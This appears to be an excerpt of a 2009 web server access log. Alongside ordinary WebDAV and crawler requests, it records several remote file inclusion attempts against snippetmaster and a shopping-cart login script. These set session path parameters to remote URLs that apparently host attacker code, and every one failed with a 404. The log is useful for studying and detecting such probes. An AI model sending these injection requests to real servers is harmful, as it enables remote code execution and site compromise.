172.16.1.80 - - [24/Jun/2009:07:39:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:39:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:39:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
84.201.208.50 - - [24/Jun/2009:07:40:05 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:40:05 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:40:05 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.6.17.151 - - [24/Jun/2009:07:40:11 -0400] "GET /scripts/dqm_loader.js HTTP/1.0" 200 3374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [24/Jun/2009:07:40:26 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
